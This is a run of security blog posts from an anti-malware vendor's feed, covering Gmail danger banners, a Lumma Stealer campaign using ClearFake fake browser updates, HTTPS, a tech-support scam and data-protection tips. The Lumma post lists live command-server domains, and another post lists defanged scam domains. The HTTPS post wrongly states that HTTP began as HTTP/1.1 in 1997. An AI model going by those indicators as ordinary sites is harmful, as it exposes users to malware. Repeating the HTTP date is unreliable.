    This Message Seems Dangerous -What to Do?
    Fraudulent sender’s address, which is not in the contact list

    If the email is authentic after performing the above checks, click “Looks safe”, and the banner will disappear. This action informs Gmail’s AI that you trust the sender and stops displaying the flag. However, sometimes Gmail won’t let you click “Looks Safe”. Instead, it will just offer the option to “Delete” or nothing at all, indicating Gmail has determined that the email is malicious.

    If you’re still convinced it’s safe, you must request Google Support to fix the problem. In any case, it’s important to remember that your discretion is key in handling suspicious emails. If you don’t trust the email, don’t click on any links, don’t download any attachments, and don’t reply.

    It’s important to understand that legitimate senders can also send you malware if their email has been compromised. The most reliable option is to contact the sender outside of Gmail and ask them directly if the email came from them.

    Report the Email

    If you determine that the message is a phishing scam, click “Report Dangerous” or “Report Phishing”. This will move the suspicious email to your spam folder and alert Google’s anti-malware team to help prevent similar phishing attacks. The email will be automatically deleted after 30 days, but you can also delete it manually.

    This Message Seems Dangerous - Godaddy
    Select “Report as dangerous”

    Gmail Labeling My Messages As Dangerous

    Now, let’s switch to the point of view of a sender. In some cases legitimate businesses, especially ones that send newsletters, encounter Gmail flagging their emails as “dangerous”. This happens because the system is triggered by signs characteristic of spam mailings. The following are the possible triggers that cause the banner to appear:

    • Too many recipients (the system often labels chains of emails that way)
    • Too many images
    • Too many attachments
    • Too many hyperlinks
    • Poor grammar/punctuation
    • Your email address is in the spam filter database
    • You have not set up email authentication
    • Your device is infected with malware
    • The email has no unsubscribe button (or link)
    • You are sending it from the corporate domain

    If you’re encountering this issue, remember that you have the power to optimize your email template design. If your emails have a design element, there might be code in your email template that flags them. For example, some chunks in your email that optimize the display on different devices may be suspicious to Gmail:

    /* MOBILE STYLES */
    @media screen and (max-width: 525px) {
    .mobile-hide {
    display: none !important;
    }
    }

    This class is used to hide some elements to make them fit on mobile screens, but it can cause a red banner.

    More Careful Handling

    If you send business emails to a mailing list, checking your rejection and complaint rates is essential. Keep them as low as possible by immediately removing addresses where you received a rejection or complaint from your database. For instance, if none of the user’s emails have been opened in the last six months, consider that an inactive account and stop mailing them.

    You can email fewer people or use Gmail’s “blind carbon copy” (BCC) feature, which hides recipients’ email addresses from each other. This reduces the likelihood of Gmail flagging your email because you won’t be spreading personal information (PII).

    Another important point is allowing recipients to unsubscribe from your mailing list. Ensure your emails always have an “Unsubscribe” link in the footer.

    Set Up Email Authentication

    SPF, DKIM, and DMARC are email authentication methods that confirm to ISPs and mailers that you are authorized to send emails from a particular domain. Verifying an account with SPF, DKIM, and DMARC is vital, and Google also recommends using all three authentication methods.

    These functions are briefly described:

    • SPF (Sender Policy Framework) specifies which domain IP addresses can send emails from your domain.
    • DKIM (DomainKeys Identified Mail) ensures that emails traveling from server to server are not tampered with and that the receiving end can verify these emails.
    • DMARC (Domain-based Message Authentication, Reporting, and Conformance) adds an extra layer of verification by matching the validity of SPF and DKIM records. You can receive DMARC reports if an email verification fails.

    Disable Your Antivirus Email Signature

    Some antivirus programs automatically add a digital signature to outgoing emails, confirming they have been scanned and are virus-free. However, this digital signature can conflict with Gmail’s security measures, which leads to flagging your emails as potentially hazardous. Consider disabling the digital signature feature in your antivirus program to see if it resolves the problem.

    The post This Message Seems Dangerous appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/this-message-seems-dangerous/feed/ 0 10164
    Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake https://gridinsoft.com/blogs/lumma-stealer-spreads-via-fake-browser-updates/ https://gridinsoft.com/blogs/lumma-stealer-spreads-via-fake-browser-updates/#respond Mon, 17 Jun 2024 15:16:22 +0000 https://gridinsoft.com/blogs/?p=22855 Recent research uncovered a selection of websites that deploy Lumma Stealer under the guise of a browser update. They pose as tutorial pages that offer seemingly correct guides, but then open a malicious JS iframe handled with ClearFake framework. Some of these sites are active for several weeks now. Fake Tutorial Sites Spread Lumma Stealer… Continue reading Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake

    The post Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake appeared first on Gridinsoft Blog.

    ]]>
    Recent research uncovered a selection of websites that deploy Lumma Stealer under the guise of a browser update. They pose as tutorial pages that offer seemingly correct guides, but then open a malicious JS iframe handled with ClearFake framework. Some of these sites are active for several weeks now.

    Fake Tutorial Sites Spread Lumma Stealer with ClearFake Framework

    A new spreading campaign of Lumma Stealer apparently started on fake tutorial sites. Avast reports about one specific example of such a page, that uses a JS framework known as ClearFake to trick the user into running a payload. The base website, pchelperspro[.]com appears as just a page that instructs on solving an issue with Windows update, with the rest of the attack happening after spending a bit more time. Though, an attentive user will notice that the all buttons on the page are inactive, and they in fact are from a different site.

    Fake tutorial website
    Looks like just a regular website with a tutorial, but there’s a catch

    After a short timeout, the aforementioned framework kicks in, opening the fake browser update window. The way it functions, as well as the design of the fake update page, makes it particularly hard to think of it as something malicious. If, of course, you are not aware that web browsers never show such windows to begin with. Following the guidance from the fake update window makes the user download and run the malicious PowerShell script.

    The PS script, in turn, connects to the command server, loads the final payload (Lumma Stealer) and executes it. Interestingly enough, the script also performs a chain of actions targeted on system fingerprinting. In particular, it performs the following queries:

    C:\Windows\SysWOW64\netsh.exe
    C:\Windows\system32\SecurityHealthService.exe

    Addresses of command servers are encoded into the script text, and initially appear as some sketchy online shops. However, every single one was created just 20 days ago – barely a coincidence.

    Standingcomperewhitwo.shop
    Innerverdanytiresw.shop
    Lamentablegapingkwaq.shop
    Sturdyregularrmsnhw.shop
    Stickyyummyskiwffe.shop
    Greentastellesqwm.shop

    ClearFake and Lumma Stealer Short Overview

    ClearFake is a name for a JavaScript framework, that allows creating JS iframes with any needed content, circumnavigating web browser’s protective mechanisms. Originally spotted in August 2023, it was massively used in attack campaigns similar to what I’ve described above. Same as in the current campaign, it was used to display an “update your browser” page, with some additional customization depending on the browser that the victim is using. The only difference now is the use of day-timer websites instead of compromised pages, like in the original campaign.

    Fake update website ClearFake
    Appearance of a fake browser update page, built on a ClearFake framework

    Lumma Stealer, on the other hand, is a much more recognizable malicious program. Appeared just a year ago, in early 2023, it gained significant popularity and fame on the Darknet. Built around the principle of the least footprint, it is capable of avoiding detection from antiviruses that orient at typical activities of spyware. Combined with flexible spreading ways (YouTube promos of cracked software, spam in Discord), this pushed Lumma to its current popularity. From the perspective of functionality, it is a modular infostealer that collects passwords, session tokens, cryptowallet data, and so on.

    Protect Your Network Browsing & PC Activities

    Using GridinSoft Anti-Malware, you will be able to avoid shady sites and malicious frameworks before they can harm you. Its network security module will analyze the activities with multiple detection systems. Continuous database updates allow the program to have peak efficiency even against the most recent network threats. Try it out now!

    Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake

    The post Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/lumma-stealer-spreads-via-fake-browser-updates/feed/ 0 22855
    HTTPS vs HTTP https://gridinsoft.com/blogs/http-vs-https/ https://gridinsoft.com/blogs/http-vs-https/#comments Sat, 15 Jun 2024 12:56:45 +0000 https://gridinsoft.com/blogs/?p=10748 HTTPS and HTTP are constantly around us, but their difference is not really clear. What do they differ with? And why do I see these “Your connection is not secure” pop-ups when the connection is HTTP? In this article, I will explain the HTTPS vs HTTP difference and what connection type you should stick to.… Continue reading HTTPS vs HTTP

    The post HTTPS vs HTTP appeared first on Gridinsoft Blog.

    ]]>
    HTTPS and HTTP are constantly around us, but their difference is not really clear. What do they differ with? And why do I see these “Your connection is not secure” pop-ups when the connection is HTTP? In this article, I will explain the HTTPS vs HTTP difference and what connection type you should stick to.

    HTTPS vs HTTP

    HTTPS and HTTP are two protocols for transferring data between web browsers and servers. The main difference between the two is the level of security and the way data is transmitted. For example, HTTP does not use encryption, so all data is sent or received as is. This makes them vulnerable to being intercepted and read by attackers in Man-in-the-Middle attack. This protocol is suitable for transmitting publicly available information that does not require protection.

    On the other hand, HTTPS encrypts the transmitted data, providing protection against malicious users reading it. It also utilizes some features, which I will discuss in more detail. This protocol is the standard for transmitting sensitive information and establishing secure connections. Today, almost all websites use HTTPS.

    What Is HTTP?

    HTTP stands for HyperText Transfer Protocol. It is the foundational protocol the World Wide Web uses to transfer and display information on websites. HTTP operates on a client-server model where the browser (client) requests information, and the web server responds with the requested data. HTTP uses port 80 by default for insecure connections and standardized messages to facilitate communication between clients and servers. These messages include methods such as GET, POST, PUT, and DELETE, as well as status codes such as “200 OK”, “400 Bad Request”, “404 Not Found,” and “500 Internal Server Error”.

    Difference HTTPS vs. HTTP? Why is HTTP not secure?
    This is how the connection between the web browser and the server

    The first version of HTTP was released in 1997 and was called HTTP/1.1. Over time, updated versions of HTTP/2 and HTTP/3 have been released to improve performance and reliability. One of HTTP’s greatest strengths is its simplicity, which makes it easy to develop new applications and services that use HTTP as a base protocol.

    What is HTTPS?

    HTTPS stands for HyperText Transfer Protocol Secure. It is an extension of HTTP designed to provide secure communication over a computer network. HTTPS uses encryption to protect data exchanged between the client and the server. HTTPS uses Transport Layer Security (TLS) or its predecessor, Secure Sockets Layer (SSL), to encrypt the data transmitted between the browser and the server. SSL/TLS certificates contain public and private encryption keys for secure data transfer between browsers and websites. This ensures that even if the data is intercepted, it cannot be read without the decryption key.

    When a user requests a website, the server sends a certificate containing a public key verified by the user’s browser. The browser and server establish a secure connection using a TLS handshake. By default, HTTPS uses port 443 for connections. During this handshake, they agree on a shared secret key that will be used to encrypt and decrypt the data.

    By encrypting data and verifying a website’s identity, HTTPS provides users with a secure way to share and receive information online without worrying about the security of their data. This security makes HTTPS an essential protocol for online transactions, including online banking and e-commerce.

    Why is HTTP Not Safe?

    In fact, the HTTP protocol is hardly used today as it is vastly inferior to HTTPS. First, HTTP does not encrypt data between the server and the client, making it a cakewalk for attackers to intercept your transmitted data. Moreover, HTTP’s lack of authentication makes it a prime target for man-in-the-middle attacks.

    In addition, HTTP does not authenticate the server to which the client is connecting. This allows attackers to spoof websites and trick users into providing sensitive information. When using HTTP, there is no guarantee that data has not been altered during transmission, making attacks aimed at spoofing or modifying data possible.

    How to Verify I’m Using HTTPS?

    To verify that you are using HTTPS when browsing a website, look at the URL in your browser’s address bar. It should start with “https://” instead of “http://”. Also, pay attention to the padlock icon in the address bar, usually to the left of the URL. A closed padlock indicates that the connection is secure.

    HTTPS in the address bar
    The sign you are using HTTPS

    Modern browsers often use additional indicators or visual cues, such as highlighting the address bar in green to show that the site uses HTTPS and has a valid SSL/TLS certificate. You can also click the lock icon for more information about connection security.

    Difference HTTPS vs. HTTP? Why is HTTP not secure?
    If you get to an unsecured website, the browser will warn you

    How to Boost Online Security?

    Improving web browsing safety requires quite a lot of attention, but once you get used to it, the process will become almost unnoticeable. First, be vigilant when surfing the web and use a security solution. Pay attention to the lock icon in the address bar, and do not enter any sensitive data on sites that do not use encryption.

    Another tip here is to use a software that can block suspicious and phishing pages. GridinSoft Anti-Malware has a built-in Internet security module to block phishing, scam and other shady pages. Try it out by pressing the banner below!

    HTTPS vs HTTP

    The post HTTPS vs HTTP appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/http-vs-https/feed/ 1 10748
    Windows Defender Security Warning https://gridinsoft.com/blogs/windows-defender-security-warning/ https://gridinsoft.com/blogs/windows-defender-security-warning/#respond Fri, 07 Jun 2024 16:43:55 +0000 https://gridinsoft.com/blogs/?p=22616 “Windows Defender Security Warning” is a scam website that falsely claims your PC is infected and urges you to contact Microsoft tech support. This scam is part of a larger scheme aimed at deploying unwanted software on users’ devices and extracting money for resolving nonexistent issues. It has been around for some time and targets… Continue reading Windows Defender Security Warning

    The post Windows Defender Security Warning appeared first on Gridinsoft Blog.

    ]]>
    “Windows Defender Security Warning” is a scam website that falsely claims your PC is infected and urges you to contact Microsoft tech support. This scam is part of a larger scheme aimed at deploying unwanted software on users’ devices and extracting money for resolving nonexistent issues. It has been around for some time and targets users worldwide.

    Tech support scams represent a particularly notorious type of online fraud, utilizing various tactics to coerce people into making a phone call to a fake support service. The Windows Defender Security Warning scam is one of the most enduring and widespread methods used in these schemes. In this article, I will describe what this scam is, how it operates, and how you can avoid falling victim to it in the future.

    What is Windows Defender Security Warning?

    As mentioned earlier, the Windows Defender Security Warning typically appears as a browser window after clicking a link on a certain website. It displays numerous smaller windows, which are actually non-interactive images. These fake alerts inform the user that their PC is blocked “for security reasons”. In the background, a robotic voice claims the following:

    “Important security message! Your computer has been locked up. Your IP address was used without your knowledge or consent to visit websites that contain identity theft virus. To unlock the computer please call the support immediately. Please do not attempt to shut down or restart your computer. That will lead to data loss and identity theft.”

    Clicking on any of the site elements – which in fairness may happen randomly – results in the website switching to a full screen, with no obvious way out. Escape button won’t work, and roaming the mouse around the screen won’t help out either. If the victim is not aware of combinations like Ctrl+F4, Alt+Tab or Ctrl+Shift+Esc, it may look like a trap. That, along with the sound alert, is what should push the user towards following the scam’s guidance and call the support.

    Windows Defender Security Warning scam page
    Typical example of a Windows Defender Security Warning page

    As you can see, this is just a scam designed to capitalize on the fear of individuals who may have less knowledge about computer security or computers in general. However, let’s take a closer look at how this scam operates—there are quite a few interesting tactics involved.

    Windows Defender Security Warning Mechanism Explained

    The scam begins by luring users to the Windows Defender Security Warning page. To achieve this, scammers often purchase link placements on dubious websites, such as those hosting pirated movies. A user clicking on a play button or attempting to skip an ad in the video player may be redirected to the scam site.

    The domains hosting this scam can vary widely, but they typically include some mention of Microsoft in the URL. In some egregious instances, fraudsters have even managed to secure hosting from Microsoft themselves. Below, you can find a list of sites used in this scam campaign:

    digitalcompletes[.]online spicyhotrecipes[.]site rickyhousing[.]xyz
    gardenhub[.]site morningh[.]shop robortcleaning[.]site
    jadeneal[.]autos programmaticcrooks[.]online elhiuwf[.]cf
    hitorikawag[.]top adultfriend[.]store yeddt[.]jet
    jonwirch[.]com aweqaw12d[.]tk helpadvance[.]ga
    333waxonet[.]ml noblevox[.]com risingsolutions[.]online
    pixua[.]com adultfriend[.]site giveserendipity[.]website
    connectflash[.]ml ondigitalocean[.]app dothrakiz[.]com
    jbvhjcbjzvhxvhzcjgzvgcczgh29[.]ml digitalflawless[.]ga todogallina[.]es
    markmoisturise[.]online enterthecode[.]org ebonygirlslive[.]com

    Once the user lands on the scam site, it typically goes fullscreen and starts playing the previously mentioned audio message. The main goal of this message is to coerce the victim into contacting “tech support” using the phone number displayed on the site, which is mentioned multiple times. The phone call marks the final phase of the scam.

    The so-called support manager begins by instructing the user to download sketchy software purported to resolve the issue—without explaining how the software addresses identity compromise. Throughout the life of this scam, various fraudulent programs have been offered, including SystemKeeper, Driver Updater, and Wise System Mechanic. As expected, all these are pseudo-effective unwanted programs that further prompt users to pay for fixing a myriad of non-existent problems.

    What is the purpose of all this, you might ask? Money is the short and universal answer. The fraudsters posing as tech support managers receive commissions for each user they persuade to download the software. Meanwhile, the developers of this software profit from users purchasing licenses. Considering how long this scam has been active, the monetary turnover is quite substantial.

    How to Protect Against Windows Defender Security Warning Scam?

    The primary advice for protecting against the Windows Defender Security Warning scam and similar schemes is to avoid websites that initiate these scams. As mentioned, the majority of redirects to scam websites originate from pages hosting pirated content. This should be another reason to steer clear of such sites, beyond the fact that content piracy is illegal. Additionally, pirated software or games pose a significant security risk.

    Learn how genuine notifications from security software should look, and how they should not. Neither Microsoft Defender nor other antivirus/antimalware programs issue security notifications through web browsers. None of them will prompt you to call support while appearing to block your computer. And, importantly, no legitimate tech support from any security vendor will ever advise you to install questionable third-party software.

    Use reliable antivirus software with network protection. To prevent scam pages from opening and to ensure your system remains secure regardless of any fake alerts, a robust antivirus solution is essential. GridinSoft Anti-Malware offers excellent malware removal capabilities and network protection, backed by a multi-component detection system and regular updates.

    GridinSoft Anti-Malware main screen

    Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

    After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

    Scan results screen

    Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

    Removal finished

    The post Windows Defender Security Warning appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/windows-defender-security-warning/feed/ 0 22616
    10 Ways to Protect Your Personal Data https://gridinsoft.com/blogs/protect-your-personal-data/ https://gridinsoft.com/blogs/protect-your-personal-data/#comments Tue, 21 May 2024 01:15:57 +0000 https://blog.gridinsoft.com/?p=1887 The first hacking attacks and the realization of the danger of trusting information to the digital media became a shock to computer users. That’s when the question of data protection rose, and the development of the first antivirus programs began. And that was even before the Internet became a usual thing. Nowadays, when every home… Continue reading 10 Ways to Protect Your Personal Data

    The post 10 Ways to Protect Your Personal Data appeared first on Gridinsoft Blog.

    ]]>
    The first hacking attacks and the realization of the danger of trusting information to the digital media became a shock to computer users. That’s when the question of data protection rose, and the development of the first antivirus programs began. And that was even before the Internet became a usual thing. Nowadays, when every home is a part of the network, it is vital to protect data. Here, we shall list and speculate on the most effective yet doable data security measures.

    What Is Data Protection?

    People have been practicing data protection since ancient times. Imagine a messenger running from one city to another, carrying a ribbon with seemingly random letters. Or a medieval scribe who makes copies of his manuscripts. Both were protecting data. The runner was using a scytale encoding to keep the message from being read by enemies should he even be caught. The writer made a copy of the text to hide it in a chest to protect it from wind, rain, snow, and thieves. Today we do the same things, but the threats are different.

    Data protection encompasses any measures we take to secure data regardless of where it is stored: on a remote server or a hard disk of our computer. These measures include inputting passwords to any devices or Internet accounts, undergoing biometric authentication, installing antivirus software, conducting regular scans, etc. These measures can be arbitrary or obligatory.

    What Are Data Protection Regulations?

    People’s attitude to the security of their private data can be astoundingly careless. But it’s their problem. On the contrary, those companies who take responsibility for storing or processing their clients’ personal data (like social networks or electronic mailboxes, state registries, public services, etc.) oblige themselves or are obliged by law to implement data protection regulations within their workspace. An example of such obligatory guidelines is GDPR, the International General Data Protection Regulations accepted in the European Union in 2018.

    Why Is it Important?

    One can hardly find a modern industry that would not rely on information technologies or involve them. Criminals and thieves of all sorts now have a new catch – information. Hackers can steal information, destroy it, blackmail owners with its disclosure, or encrypt the data on hacked computers. Then they can demand a ransom from their victims for having their data decrypted. The last case is the first viable and widely-used hacker business scheme – a ransomware attack. In a world where all person’s work, private life, plans, notes, and even dreams become the content of a portable device – the security of this content becomes crucial, and its loss can be deplorable.

    Ways to Protect Data
    Ways to Protect Your Personal Data

    Ways To Protect You Personal Data

    What is very important to remember is that although various internet services comply with their data security policies and regulations, users should cooperate with these services and not overthrow all the responsibility for the safety of their data on the corporations. The following list of data-safety measures is good for protecting data on a personal device and the cloud.

    1. Set up two-factor authentication on your financial accounts.

    Financial accounts are usually more protected than social media profiles, mailboxes, or messengers, but they require more attention and care. A breach of a bank account is like nothing you want to experience. Therefore, use the two-factor authentication in your banking service to protect yourself from fraud, deceptive social engineering, and phishing attacks. All it takes is to press a button on your telephone every time you try to access your banking account. If any crooks get your login and password, you won’t let them use those credentials.

    2. Malware protection is a must.

    Without an anti-malware solution any system today is bare against a jungle of harmful entities. A modern security program will:

    1. warn you about suspicious webpages you are trying to access;
    2. stop you from entering overtly dangerous sites;
    3. quarantine and remove any recognizable malicious programs as soon as they end up on your device;
    4. clear all hidden threats with the help of a deep scan function.

    GridinSoft Anti-Malware is a versatile solution featuring all the described functions and providing consistent protection without inconveniences typical for bulky and “heavy” antivirus programs. Economically beneficial, Anti-Malware is one of the most efficient and quick security programs on the market.

    10 Ways to Protect Your Personal Data

    3. Use a firewall.

    A firewall is a program filter separating a network it protects from the external environment. It can be protecting one computer or an entire workgroup. Most of the OSs have an in-built firewall. It controls the incoming and outbound traffic using pre-defined rules. Users tend to switch off firewalls temporarily to access suspicious websites but later forget to reactivate the defense. That is dangerous and puts a device or a network at risk.

    4. Use free Wi-Fi with care.

    A Wi-Fi router can be a source of a so-called Man-in-the-middle attack that uses a spoofed network name. After you access the wrong network by mistake, all the data outbound from your device comes into the possession of crooks. Later your data can be used directly against you up to identity theft or blackmailing, or, in better cases, it can be collected and sold to third parties for their own needs.

    5. Protect your email accounts.

    An email account is the core of any person’s virtual representation. Profiles in social media and other internet services often refer to your email address, and that address is essential to password restoration if you happen to need that. Therefore, email safety should be of the utmost concern. Remember to log out from your mailbox on any device except for yours. Also, make sure you use a strong password and change passwords from time to time.

    6. Update your software regularly.

    Computer software nowadays gets updated automatically or with the slightest effort from the user. However, many program vulnerabilities emerge in in-between moments, when one program (let’s say operating system) is already updated, while some different software is not yet up-to-date. Such inconsistent versions can lead to malware infection if cybercriminals intend to pull that over. The most wanted updates are the updates of security programs. The more malware signatures an antivirus program has in its libraries, the more malicious items it will remove from your PC before they can even harm it.

    7. Back up your data.

    Advice to have a backup of all critical information to preempt physical damage of the drive, loss, or theft is one of the wisest hints one could harken to. Anyone who has ever experienced anything mentioned above knows how important it is to have everything in two or maybe even three instances.

    8. Don’t store passwords on your laptop or mobile device.

    Always consider that your portable device might get into someone else’s hands. It might be a good person, but some bad person might also steal your device. You must be ready for such an unfortunate event. And that means not only photos and videos you wouldn’t like anyone to see should not be there on your device, but definitely, passwords should not be stored thereon. By the way, don’t forget to log out from all the accounts remotely when you notice your device is gone.

    9. Use Strong, Unique Passwords

    Using strong, unique passwords for each of your online accounts is one of the most effective ways to protect your personal data. Weak passwords are easy for hackers to guess, and using the same password for multiple accounts means that if one account is compromised, all of your other accounts are at risk too.

    Tips for Creating Strong, Unique Passwords:

    • Make It Long: Aim for at least 12 characters. The longer your password, the harder it is to crack.
    • Mix It Up: Use a combination of uppercase letters, lowercase letters, numbers, and special characters (like !, @, #, $).
    • Avoid Obvious Choices: Don’t use easily guessable information like your name, birthdate, or common words like “password” or “123456.”
    • Use a Password Manager: Password managers can create and store complex passwords for you, so you don’t have to remember them all. This ensures each of your passwords is unique and secure.

    Imagine your password is a secret code that only you and your best friend know. Make it something fun and memorable, like a phrase from your favorite book or movie, but change some letters to numbers or symbols.

    Example: If you love the book “Harry Potter“, you could start with “HarryPotterRocks” and make it stronger by adding numbers and symbols: “H@rryP0tt3rR0ck$!

    Instead of a single word, think of a sentence or phrase you can remember easily. Make it something silly and fun.

    Example: “MyC@tJumpsOver7Rainbows!” This phrase is long, includes a mix of characters, and is easy to remember because it’s a funny mental image.

    Just like you wouldn’t use the same secret handshake forever, change your passwords from time to time to keep them fresh and secure.

    10. Be Cautious with Phishing Attempts

    Phishing is when scammers try to trick you into giving them your personal information, like passwords or credit card numbers, by pretending to be someone you trust. They often do this through fake emails, messages, or websites. Being cautious helps you avoid these traps and keeps your information safe.

    • Check the Sender’s Email Address: Scammers often use addresses that look similar to real ones but have slight differences.
    • Look for Red Flags: Be suspicious of emails or messages with urgent requests, bad grammar, or unfamiliar links.
    • Don’t Click on Suspicious Links: Hover over links to see where they lead before clicking. If it looks suspicious, don’t click.
    • Verify Requests: If you get an email or message asking for personal information, verify it by contacting the company directly using a phone number or website you know is legitimate.
    • Use Anti-Phishing Tools: Many email services and web browsers have built-in tools to help detect and block phishing attempts.

    Always question messages that ask for personal information or seem unusual. It’s okay to be curious and skeptical – it’s better to be safe than sorry.

    The post 10 Ways to Protect Your Personal Data appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/protect-your-personal-data/feed/ 1 1887